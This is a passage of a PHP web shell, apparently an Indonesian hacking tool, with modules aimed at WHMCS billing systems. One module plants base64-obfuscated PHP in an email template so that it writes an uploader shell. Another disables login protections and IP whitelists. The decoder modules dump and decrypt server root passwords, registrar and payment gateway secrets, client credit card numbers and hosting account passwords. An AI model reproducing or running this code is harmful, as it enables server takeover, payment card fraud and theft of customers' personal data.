  5213. <tr><td>db_name</td><td><input type="text" size="80" name="anu4"></td></tr>
  5214. <tr><td align="center" colspan="2"> <textarea rows='10' cols='67'
  5215. name=shell>{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajROQ2cwS1BEOXdhSEFOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNpUnpZM0pwY0hSdVlXMWxJRDBnSkY5VFJWSldSVkpiSjFORFVrbFFWRjlPUVUxRkoxMDdEUW9rWm1sc1pXNWhiV1VnUFNBa1gxQlBVMVJiSW1acGJHVnVZVzFsSWwwN0RRcHBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKUGNHVnVJaWtOQ25zTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWFXeGxibUZ0WlNrcERRcDdEUW9rWm1sc1pXTnZiblJsYm5SeklEMGdhSFJ0YkdWdWRHbDBhV1Z6S0dacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbWFXeGxibUZ0WlNrcE93MEthV1lvSVNSbWFXeGxZMjl1ZEdWdWRITXBEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrUlhKeWIzSWdUbTkwYUdsdVp5QkdhV3hsUEM5bWIyNTBQaUk3RFFwOURRcGxiSE5sRFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1JtbHNaU0JrYjJWeklHNXZkQ0JsZUdsemRDRThMMlp2Ym5RK0lqc05DbjBKQ1EwS1pXeHpaU0JwWmlna1gxQlBVMVJiSW5OMVltMXBkQ0pkSUQwOUlDSkVaV3hsZEdVaUtRMEtldzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25zTkNtbG1LSFZ1YkdsdWF5Z2tabWxzWlc1aGJXVXBLUWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJSE4xWTJObGMzTm1kV3hzZVNCa1pXeGxkR1ZrSVR3dlptOXVkRDRpT3cwS1pXeHpaUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCa1pXeGxkR1VnWm1sc1pTRThMMlp2Ym5RK0lqc05DbjBOQ21Wc2MyVU5DaVJ6ZEdGMGRYTWdQU0FpUEdadmJuUWdabUZqWlQwblZtVnlaR0Z1WVNjZ2MzUjViR1U5SjJadmJuUXRjMmw2WlRvZ09IQjBKejVHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wSVR3dlptOXVkRDRpT3cwS2ZRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pUWVhabElpa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0J6ZEhKcGNITnNZWE5vWlhNb2FIUnRiRjlsYm5ScGRIbGZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOXVkR1Z1ZEhNaVhTa3BPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25WdWJHbHVheWdrWm1sc1pXNWhiV1VwT3cwS0pHaGhibVJzWlNBOUlHWnZjR1Z1S0NSbWFXeGxibUZ0WlN3Z0luY2lLVHNOQ21sbUtDRWthR0Z1Wkd4bEtRMEtKSE4wWVhSMWN5QTlJQ0k4Wm05dWRDQm1ZV05sUFNkV1pYSmtZVzVoSnlCemRIbHNaVDBuWm05dWRDMXphWHBsT2lBNGNIUW5Qa052ZFd4a0lHNXZkQ0J2Y0dWdUlHWnBiR1VnWm05eUlIZHlhWFJsSUdGalkyVnpjeUVnUEM5bWIyNTBQaUk3RFFwbGJITmxEUXA3RFFwcFppZ2habmR5YVhSbEtDUm9ZVzVrYkdVc0lDUm1hV3hsWTI5dWRHVnVkSE1wS1EwS0pITjBZWFIxY3lBOUlDUnpkR0YwZFhNdUlqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1EyOTFiR1FnYm05MElIZHlhWFJsSUhSdklHWnBiR1VoSUNoTllYbGlaU0I1YjNVZ1pHbGtiaWQwSUdWdWRHVnlJR0Z1ZVNCMFpYaDBQeWs4TDJadmJuUStJanNOQ21aamJHOXpaU2drYUdGdVpHeGxLVHNOQ24wTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCb2RHMXNaVzUwYVhScFpYTW9KR1pwYkdWamIyNTBaVzUwY3lrN0RRcDlEUXBsYkhObERRcDdEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrVG04Z1ptbHNaU0JzYjJGa1pXUWhQQzltYjI1MFBpSTdEUXA5RFFvL1BnMEtQSFJoWW14bElHSnZjbVJsY2owaU1DSWdZV3hwWjI0OUltTmxiblJsY2lJK1BIUnlQangwWkQ0OGRHRmliR1VnZDJsa2RHZzlJakV3TUNVaUlHSnZjbVJsY2owaU1DSStQSFJ5UGp4MFpENE5DanhtYjNKdElHMWxkR2h2WkQwaWNHOXpkQ0lnWVdOMGFXOXVQU0k4UDBWamFHOGdKSE5qY21sd2RHNWhiV1U3UHo0aVBnMEtQR2x1Y0hWMElITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2JtRnRaVDBpWm1sc1pXNWhiV1VpSUhSNWNHVTlJblJsZUhRaUlIWmhiSFZsUFNJOFAwVmphRzhnSkdacGJHVnVZVzFsT3o4K0lpQnphWHBsUFNJM01pSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCemRIbHNaVDBpWTI5c2IzSTZiR2x0WlR0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNd01EQXdNREFpSUc1aGJXVTlJbk4xWW0xcGRDSWdkbUZzZFdVOUlrOXdaVzRpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdjM1I1YkdVOUltTnZiRzl5T214cGJXVTdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pNREF3TURBd0lpQnVZVzFsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pFWld4bGRHVWlQand2ZEdRK1BDOTBjajQ4TDNSaFlteGxQZzBLUEdadmJuUWdabUZqWlQwaVZtVnlaR0Z1WVNJZ2MzUjViR1U5SW1admJuUXRjMmw2WlRvZ01URndkQ0krRFFvOGRHVjRkR0Z5WldFZ2JtRnRaVDBpWTI5dWRHVnVkSE1pSUhOMGVXeGxQU0pqYjJ4dmNqcHNhVzFsTzJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpBd01EQXdNQ0lnWTI5c2N6MGlOekFpSUhKdmQzTTlJakkxSWo0TkNqdy9SV05vYnlBa1ptbHNaV052Ym5SbGJuUnpPejgrUEM5MFpYaDBZWEpsWVQ0OEwyWnZiblErUEdKeVBnMEtQR2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSnpkV0p0YVhRaUlIWmhiSFZsUFNKVFlYWmxJajROQ2p4cGJuQjFkQ0IwZVhCbFBTSnlaWE5sZENJZ2MzUjViR1U5SW1OdmJHOXlPbXhwYldVN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak1EQXdNREF3SWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZzBLUEhBK0RRbzhhRE0rWDFWUVRFOUJSQ0JHU1V4Rlh6eG9NejROQ2cwS1BEOXdhSEFOQ2cwS1pXTm9ieUFuUEdadmNtMGdZV04wYVc5dVBTSWlJRzFsZEdodlpEMGljRzl6ZENJZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdibUZ0WlQwaWRYQnNiMkZrWlhJaUlHbGtQU0oxY0d4dllXUmxjaUkrSnpzTkNnMEtaV05vYnlBblVFRlVTQ0JVUVZKSFJWUWdPaUE4YVc1d2RYUWdibUZ0WlQwaWRYQnNiMkZrZEc4aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpZEdWNGRDSWdjMmw2WlQwaU5UQWlJSFpoYkhWbFBTSW5MbWRsZEdOM1pDZ3BMaWNpUGp4aWNpQXZQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0l6TUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpYzNWaWJXbDBJaUJwWkQwaVgzVndiQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzltYjNKdFBpYzdEUXBwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0tTQjdEUXBwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlVFOVRWRnNuZFhCc2IyRmtkRzhuWFM0bkx5Y3VKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdEUW9OQ21WamFHOGdKenhtYjI1MElHTnZiRzl5UFNKc2FXMWxJajViSzEwZ1ZYQnNiMkZrSUZOMWEzTmxjeUE2ZGlBOFluSXZQaUJiSzEwZ0p5NGtYMUJQVTFSYkozVndiRzloWkhSdkoxMHVJaThpTGlSZlJrbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRPdzBLZlNCbGJITmxJSHNOQ21WamFHOGdKMXQrWFNCVmNHeHZZV1FnUm1GcGJHVmtJRlJmVkNCYmZsMDhMMlp2Ym5RK1BHSnlQaWM3RFFwOUlIME5DajgrRFFvPScpOw0KDQokZm9wZW4gPSBmb3BlbiAoJ2RtLnBocCcsJ3cnKTsNCiR3cml0ZSAgPSBmd3JpdGUoJGZvcGVuICwgJGMwZGUpOw=='));{/php}</textarea>
  5216. </td></tr>
  5217. <tr><td align="center" colspan="2"><input class=submit type="submit" value=" HAJAR BOS " name="plapon"></td></tr>
  5218. </table>
  5219. <br>
  5220. </form>
  5221. </center>
  5222. <?php
  5223. if(isset($_POST['plapon'])) {
  5224. $anu1=$_POST['anu1'];
  5225. $anu2=$_POST['anu2'];
  5226. $anu3=$_POST['anu3'];
  5227. $anu4=$_POST['anu4'];
  5228. @mysql_connect($anu1,$anu2,$anu3);
  5229. @mysql_select_db($anu4);
  5230. $shell=str_replace("'","'",$shell);
  5231. $gosok_shell=$_POST['shell'];
  5232. $colok="UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE subject ='Welcome'";
  5233. $udah_ganteng=@mysql_query($colok);
  5234. if($udah_ganteng) {
  5235. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
  5236. }
  5237. }
  5238.  
  5239. }elseif(isset($_GET['x'])&&($_GET['x']=='dmwhmcs4')){?>
  5240. <form action="?dm=<?php echo $pwd; ?>&amp;x=dmwhmcs4" method="post">
  5241. <p><br/><body>
  5242. <center><img src="http://ben90.com/wp-content/uploads/2009/07/whmcs-logo.gif"> <br/><br/><b><span class="b7">O=:[ BYPASS LOGIN 2FACTOR ]:=O</span></b><br/><br/>
  5243. <p><form method="post">
  5244. <table border=1 style="border-collapse: collapse">
  5245. <tr><td>db_host </td><td><input type="text" size="60" name="anu1" value="localhost"></td></tr>
  5246. <tr><td>db_username </td><td><input type="text" size="60" name="anu2"></td></tr>
  5247. <tr><td>db_password</td><td><input type="text" size="60" name="anu3"></td></tr>
  5248. <tr><td>db_name</td><td><input type="text" size="60" name="anu4"></td></tr>
  5249. <tr><td align="center" colspan="2"><input class=submit type="submit" value=" HAJAR BOS " name="plapon"></td></tr>
  5250. </table>
  5251. <br>
  5252. </FORM>
  5253. </center>
  5254. <?php
  5255. if(isset($_POST['plapon'])) {
  5256. $anu1=$_POST['anu1'];
  5257. $anu2=$_POST['anu2'];
  5258. $anu3=$_POST['anu3'];
  5259. $anu4=$_POST['anu4'];
  5260. @mysql_connect($anu1,$anu2,$anu3);
  5261. @mysql_select_db($anu4);
  5262. $crot1="UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'";
  5263. $crot2="UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'";
  5264. $crot3="UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'";
  5265. $crot4="UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'";
  5266. $crot5="UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'";
  5267. $crot6="UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'";
  5268. $crot7="UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'";
  5269. $crot8="UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'";
  5270. $crot9="UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'";
  5271. $crot10="UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'";
  5272. $udah_ganteng=@mysql_query($crot1);
  5273. $udah_ganteng=@mysql_query($crot2);
  5274. $udah_ganteng=@mysql_query($crot3);
  5275. $udah_ganteng=@mysql_query($crot4);
  5276. $udah_ganteng=@mysql_query($crot5);
  5277. $udah_ganteng=@mysql_query($crot6);
  5278. $udah_ganteng=@mysql_query($crot7);
  5279. $udah_ganteng=@mysql_query($crot8);
  5280. $udah_ganteng=@mysql_query($crot9);
  5281. $udah_ganteng=@mysql_query($crot10);
  5282. if($udah_ganteng) {
  5283. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
  5284. }
  5285. }
  5286. }elseif(isset($_GET['x'])&&($_GET['x']=='whmcsphp7')){
  5287. echo'<form action="?dm='.$pwd.'&amp;x=whmcsphp7" method="post">
  5288. <br/>
  5289. <center><br/><b>
  5290. <span class="b7">O=:[ WHMCS DECODER ]:=O</span></b><br/><br/>
  5291. <p>
  5292. <table border=1 style="border-collapse: collapse">
  5293. <tr><td>db_host </td><td><input type="text" size="60" name="anu1" value="" placeholder="localhost"></td></tr>
  5294. <tr><td>db_username </td><td><input type="text" size="60" name="anu2"></td></tr>
  5295. <tr><td>db_password</td><td><input type="text" size="60" name="anu3"></td></tr>
  5296. <tr><td>db_name</td><td><input type="text" size="60" name="anu4"></td></tr>
  5297. <tr><td>cc_encryption_hash</td><td><input type="text" size="60" name="anu5"></td></tr>
  5298. </table>
  5299. <br>
  5300. <p><br /><b><span class="b7">O=:[ Location configuration.php ]:=O</span></b><br /></p>
  5301. <input type="text" size="60" name="configuration" value="" placeholder="configuration.php"><br /><br /><input class="submit" type="submit" name="plapon">
  5302. </form>
  5303. </center>';
  5304.  
  5305. if(isset($_POST['plapon'])){
  5306. if(!empty($_POST['anu2']) && (!empty($_POST['anu3'])) && (!empty($_POST['anu4'])) && (!empty($_POST['anu5']))){
  5307. if($_POST['anu1']){
  5308. $db_host=$_POST['anu1'];
  5309. }else{
  5310. $db_host='localhost';
  5311. }
  5312. $db_username=$_POST['anu2'];
  5313. $db_password=$_POST['anu3'];
  5314. $db_name=$_POST['anu4'];
  5315. $cc_encryption_hash=$_POST['anu5'];
  5316. }else{
  5317. include($_POST['configuration']);
  5318. }
  5319.  
  5320. $connect=new mysqli($db_host,$db_username,$db_password,$db_name);
  5321. if($connect->connect_error){
  5322. echo'<center><br/><span class="b7">'.$connect->connect_error.'</span><br/></center>';
  5323. }else{
  5324. $tblservers=$connect->query("SELECT * FROM tblservers");
  5325. echo "<center><br/><br/><b><span class='b7'>O=:[ HOST ROOT ]:=O</span></b><br/><br/></center>
  5326. <table border='1' cellpadding='5' align='center' style='border-collapse: collapse'>
  5327. <tr>
  5328. <td align='center'><b>TYPE</b></td>
  5329. <td align='center'><b>ACTIVE</b></td>
  5330. <td align='center'><b> IP ADDRESS</b></td>
  5331. <td align='center'><b>HOSTNAME</b></td>
  5332. <td align='center'><b>USERNAME</b></td>
  5333. <td align='center'><b>PASSWORD</b></td>
  5334. <td align='center'><b>ACCESS HASH</b></td>
  5335. <td align='center'><b>NAME SERVER</b></td>
  5336. </tr>";
  5337. while($v=mysqli_fetch_array($tblservers)){
  5338. echo"<tr><td align='center'>{$v['type']}</td>
  5339. <td align='center'>{$v['active']}</td>
  5340. <td align='center'>{$v['ipaddress']}</td>
  5341. <td align='center'>{$v['hostname']}</td>
  5342. <td>{$v['username']}</td>
  5343. <td>".dec($v['password'],$cc_encryption_hash)."</td>";
  5344. if(empty($v['accesshash'])){
  5345. echo"<td>{$v['accesshash']}</td>";
  5346. }else{
  5347. echo"<td><textarea style='width:150px; height:150px'; onclick='this.focus(); this.select();'>{$v['accesshash']}</textarea></td>";
  5348. }
  5349. echo"<td>{$v['nameserver1']}</td></tr>\n";
  5350. }
  5351. echo"</table>";
  5352. $tblregistrars=$connect->query("SELECT *FROM tblregistrars");
  5353. echo "<center><br/><br/><b><span class='b7'>O=:[ DOMAIN REGISTRAR ]:=O</span></b><br/><br/></center><table border='1' align='center' cellpadding='5' style='border-collapse: collapse'>
  5354. <tr> <td align='center'><b> <font color='lime'> REGISTRAR</font></b></td>
  5355. <td align='center'><b> <font color='lime'> SETTING</font></b></td>
  5356. <td align='center'><b> <font color='lime'> VALUE</font> </b></td></tr>";
  5357. while($v=mysqli_fetch_array($tblregistrars)){
  5358. $value=(!dec($v['value'],$cc_encryption_hash))?"0":dec($v['value'],$cc_encryption_hash);
  5359. echo"<tr><td align='center'><font color='white'>{$v['registrar']}</font></td>
  5360. <td align='center'><font color='white'>{$v['setting']}</font></td>
  5361. <td align='center'><font color='white'>$value</font></td></tr>\n";
  5362. }
  5363. echo "</table>";
  5364. $tblpaymentgateways=$connect->query("SELECT *FROM tblpaymentgateways");
  5365. echo "<center><br/><br/><b><span class='b7'>O=:[ PAYMENT GATEWAYS ]:=O</span></b><br/><br/></center>
  5366. <table border='1' align='center' cellpadding='5' style='border-collapse: collapse'><tr>
  5367. <td align='center'><b>GATEWAY</b></td>
  5368. <td align='center'><b>SETTING </b></td>
  5369. <td align='center'><b>VALUE </b></td>
  5370. <td align='center'><b>ORDER </b></td></tr>";
  5371. while($v=mysqli_fetch_array($tblpaymentgateways)){
  5372. echo"<tr>
  5373. <td align='center'>{$v['gateway']}</td>
  5374. <td align='center'>{$v['setting']}</td>
  5375. <td align='center'>{$v['value']}</td>
  5376. <td align='center'>{$v['order']}</td></tr>\n";
  5377. }
  5378. echo "</table>";
  5379. $tblcc=$connect->query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
  5380. echo "<center><br/><br/><b><span class='b7'>O=:[ CLIENT CREDIT CARD ]:=O</span></b><br/><br/></center><table border='1' cellpadding='5' align='center' style='border-collapse: collapse'>
  5381. <tr>
  5382. <td align='center'><b>CardType</b></td>
  5383. <td align='center'><b>CardNumb</b></td>
  5384. <td align='center'><b>Expdate</b></td>
  5385. <td align='center'><b>IssueNumb</b></td>
  5386. <td align='center'><b>FirstName</b></td>
  5387. <td align='center'><b>LastName</b></td>
  5388. <td align='center'><b>Address</b></td>
  5389. <td align='center'><b>Country</b></td>
  5390. <td align='center'><b>Phone</b></td>
  5391. <td align='center'><b>Email</b></td></tr>\n";
  5392. if(!is_array(mysqli_fetch_array($tblcc))){
  5393. echo"<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
  5394. }
  5395. while($v=mysqli_fetch_array($tblcc)){
  5396. $cchash=md5($cc_encryption_hash.$v['0']);
  5397. $s=$connect->query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'".$cchash."') as cardnum,AES_DECRYPT(expdate,'".$cchash."') as expdate,AES_DECRYPT(issuenumber,'".$cchash."') as issuenumber FROM tblclients WHERE id='".$v['0']."'");
  5398. $v2=mysqli_fetch_array($s);
  5399. echo"<tr><td align='center'>".$v2['cardtype']."</td>
  5400. <td align='center'>".$v2['cardnum']."</td>
  5401. <td align='center'>".$v2['expdate']."</td>
  5402. <td align='center'>".$v2['issuenumber']."</td>
  5403. <td align='center'>".$v2['firstname']."</td>
  5404. <td align='center'>".$v2['lastname']."</td>
  5405. <td align='center'>".$v2['address1']."</td>
  5406. <td align='center'>".$v2['country']."</td>
  5407. <td align='center'>".$v2['phonenumber']."</td>
  5408. <td align='center'>".$v2['email']."</td></tr>\n";
  5409. }
  5410. echo"</table>";
  5411. $tblhosting=$connect->query("SELECT *FROM tblhosting");
  5412. echo "<center><br/><br/><b><span class='b7'>O=:[ CLIENT HOSTING ACCOUNT ]:=O</span></b><br/><br/></center> <table border='1' cellpadding='5' align='center' style='border-collapse: collapse'><tr>
  5413. <td align='center'><b>STATUS</b></td>
  5414. <td align='center'><b>DOMAIN</b></td>
  5415. <td align='center'><b>USERNAME</b></td>
  5416. <td align='center'><b>PASSWORD</b></td>
  5417. <td align='center'><b>IP ADDRESS</b></td></tr>\n";
  5418. if(!is_array(mysqli_fetch_array($tblhosting))){
  5419. echo"<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
  5420. }
  5421. while($v=mysqli_fetch_array($tblhosting)){
  5422. echo "<tr><td align='center'>{$v['domainstatus']}</td>
  5423. <td align='center'>{$v['domain']}</td>
  5424. <td align='center'>{$v['username']}</td>
  5425. <td align='center'>".dec($v['password'],$cc_encryption_hash)."</td>
  5426. <td align='center'>{$v['assignedips']}</td></tr>\n";
  5427. }
  5428. echo "</table>";
  5429. }
  5430. }
  5431.  
  5432. }elseif(isset($_GET['x'])&&($_GET['x']=='whmcs1')){
  5433. echo'<form action="?dm='.$pwd.'&amp;x=whmcs1" method="post">
  5434. <p><br/>
  5435. <center><br /><b><span class="b7">O=:[ WHMCS DECODER ]:=O</span></b><br />
  5436. </p>
  5437. <table border="1" style="border-collapse: collapse">
  5438. <tr><td>db_host </td><td><input type="text" size="60" name="anu1" value="" placeholder="localhost"></td></tr>
  5439. <tr><td>db_username </td><td><input type="text" size="60" name="anu2"></td></tr>
  5440. <tr><td>db_password</td><td><input type="text" size="60" name="anu3"></td></tr>
  5441. <tr><td>db_name</td><td><input type="text" size="60" name="anu4"></td></tr>
  5442. <tr><td>cc_encryption_hash</td><td><input type="text" size="60" name="anu5"></td></tr>
  5443. </table>
  5444. <br>
  5445. <p><br /><b><span class="b7">O=:[ configuration.php ]:=O</span></b><br /></p>
  5446. <input type="text" size="60" name="configuration" value="" placeholder="configuration.php"><br /><br /><input class="submit" type="submit" name="plapon">
  5447. </form></center>';
  5448.  
  5449. if(isset($_POST['plapon'])){
  5450. if(!empty($_POST['anu2']) && (!empty($_POST['anu3'])) && (!empty($_POST['anu4'])) && (!empty($_POST['anu5']))){
  5451. if($_POST['anu1']){
  5452. $db_host=$_POST['anu1'];
  5453. }else{
  5454. $db_host='localhost';
  5455. }
  5456. $db_username=$_POST['anu2'];
  5457. $db_password=$_POST['anu3'];
  5458. $db_name=$_POST['anu4'];
  5459. $cc_encryption_hash=$_POST['anu5'];
  5460. }else{
  5461. include($_POST['configuration']);
  5462. }
  5463. if(mysql_connect($db_host,$db_username,$db_password)){
  5464. @mysql_select_db($db_name);
  5465. $query=mysql_query("SELECT *FROM tblservers");
  5466. echo"<center><br/><br/><b><span class='b7'>O=:[ HOST ROOT ]:=O</span></b><br/><br/></center>
  5467. <table border='1' cellpadding='5' align='center' style='border-collapse: collapse'>
  5468. <tr>
  5469. <td align='center'><b>TYPE</b></td>
  5470. <td align='center'><b>ACTIVE</b></td>
  5471. <td align='center'><b> IP ADDRESS</b></td>
  5472. <td align='center'><b>HOSTNAME</b></td>
  5473. <td align='center'><b>USERNAME</b></td>
  5474. <td align='center'><b>PASSWORD</b></td>
  5475. <td align='center'><b>ACCESS HASH</b></td>
  5476. <td align='center'><b>NAME SERVER</b></td>
  5477. </tr>";
  5478. while($v=mysql_fetch_array($query)){
  5479. echo "<tr>
  5480. <td align='center'>{$v['type']}</td>
  5481. <td align='center'>{$v['active']}</td>
  5482. <td align='center'>{$v['ipaddress']}</td>
  5483. <td align='center'>{$v['hostname']}</td>
  5484. <td>{$v['username']}</td>
  5485. <td>".dec($v['password'],$cc_encryption_hash)."</td>";
  5486. if(empty($v['accesshash'])){
  5487. echo"<td>{$v['accesshash']}</td>";
  5488. }else{
  5489. echo"<td><textarea style='width:150px; height:150px'; onclick='this.focus(); this.select();'>{$v['accesshash']}</textarea></td>";
  5490. }
  5491. echo"<td>{$v['nameserver1']}</td></tr>\n";
  5492. }
  5493. echo"</table><br><br>";
  5494. $query=mysql_query("SELECT *FROM tblregistrars");
  5495. echo"<center><br/><br/><b><span class='b7'>O=:[ DOMAIN REGISTRAR ]:=O</span></b><br/><br/></center>
  5496. <table border='1' align='center' cellpadding='5' style='border-collapse: collapse'>
  5497. <tr> <td align='center'><b> <font color='lime'> REGISTRAR</font></b></td>
  5498. <td align='center'><b> <font color='lime'> SETTING</font></b></td>
  5499. <td align='center'><b> <font color='lime'> VALUE</font> </b></td></tr>";
  5500. while($v=mysql_fetch_array($query)){
  5501. $value=(!dec($v['value'],$cc_encryption_hash))?"0":dec($v['value'],$cc_encryption_hash);
  5502. echo"<tr><td align='center'> <font color='white'> {$v['registrar']}</font></td>
  5503. <td align='center'> <font color='white'> {$v['setting']}</font></td>
  5504. <td align='center'> <font color='white'> $value</font></td></tr>\n";
  5505. }
  5506.  
  5507. echo"</table>";
  5508. $query=mysql_query("SELECT *FROM tblpaymentgateways");
  5509. echo "<center><br/><br/><b><span class='b7'>O=:[ PAYMENT GATEWAYS ]:=O</span></b><br/><br/></center>
  5510. <table border='1' align='center' cellpadding='5' style='border-collapse: collapse'><tr>
  5511. <td align='center'><b>GATEWAY</b></td>
  5512. <td align='center'><b>SETTING </b></td>
  5513. <td align='center'><b>VALUE </b></td>
  5514. <td align='center'><b>ORDER </b></td></tr>";
  5515. while($v=mysql_fetch_array($query)){
  5516. echo"<tr>
  5517. <td align='center'>{$v['gateway']}</td>
  5518. <td align='center'>{$v['setting']}</td>
  5519. <td align='center'>{$v['value']}</td>
  5520. <td align='center'>{$v['order']}</td></tr>\n";
  5521. }
  5522. echo"</table>";
  5523. $query=mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
  5524. echo "<center><br/><br/><b><span class='b7'>O=:[ CLIENT CREDIT CARD ]:=O</span></b><br/><br/></center><table border='1' cellpadding='5' align='center' style='border-collapse: collapse'>
  5525. <tr>
  5526. <td align='center'><b>CardType</b></td>
  5527. <td align='center'><b>CardNumb</b></td>
  5528. <td align='center'><b>Expdate</b></td>
  5529. <td align='center'><b>IssueNumb</b></td>
  5530. <td align='center'><b>FirstName</b></td>
  5531. <td align='center'><b>LastName</b></td>
  5532. <td align='center'><b>Address</b></td>
  5533. <td align='center'><b>Country</b></td>
  5534. <td align='center'><b>Phone</b></td>
  5535. <td align='center'><b>Email</b></td></tr>";
  5536. if(!is_array(mysql_fetch_array($query))){
  5537. echo"<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
  5538. }
  5539. while($v=mysql_fetch_array($query)){
  5540. $cchash=md5($cc_encryption_hash.$v['0']);
  5541. $s=mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'".$cchash."') as cardnum,AES_DECRYPT(expdate,'".$cchash."') as expdate,AES_DECRYPT(issuenumber,'".$cchash."') as issuenumber FROM tblclients WHERE id='".$v['0']."'");
  5542. $v2=mysql_fetch_array($s);
  5543. echo"<tr>
  5544. <td align='center'>".$v2['cardtype']."</td>
  5545. <td align='center'>".$v2['cardnum']."</td>
  5546. <td align='center'>".$v2['expdate']."</td>
  5547. <td align='center'>".$v2['issuenumber']."</td>
  5548. <td align='center'>".$v2['firstname']."</td>
  5549. <td align='center'>".$v2['lastname']."</td>
  5550. <td align='center'>".$v2['address1']."</td>
  5551. <td align='center'>".$v2['country']."</td>
  5552. <td align='center'>".$v2['phonenumber']."</td>
  5553. <td align='center'>".$v2['email']."</td></tr>\n";
  5554. }
  5555. echo"</table>";
  5556. $query=mysql_query("SELECT *FROM tblhosting");
  5557. echo"<center><br/><br/><b><span class='b7'>O=:[ CLIENT HOSTING ACCOUNT ]:=O</span></b><br/><br/></center>
  5558. <table border='1' cellpadding='5' align='center' style='border-collapse: collapse'><tr>
  5559. <td align='center'><b>STATUS</b></td>
  5560. <td align='center'><b>DOMAIN</b></td>
  5561. <td align='center'><b>USERNAME</b></td>
  5562. <td align='center'><b>PASSWORD</b></td>
  5563. <td align='center'><b>IP ADDRESS</b></td></tr>";
